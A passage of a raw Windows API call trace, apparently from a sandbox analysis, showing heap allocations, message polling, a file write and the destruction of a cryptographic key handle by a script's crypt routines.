[0228.666] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.673] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x7130, lpOverlapped=0x0) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0228.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0228.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.676] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0228.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0228.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55028 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0228.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.677] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0228.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0228.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.677] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0228.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0228.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0228.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.678] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.678] CryptDestroyKey (hKey=0xa87310) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0228.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0228.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.679] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0228.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.680] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0228.680] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0228.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0228.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.680] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0228.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0228.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0228.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0228.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0228.682] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0228.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.682] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0228.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.683] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0228.683] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0228.689] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.689] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 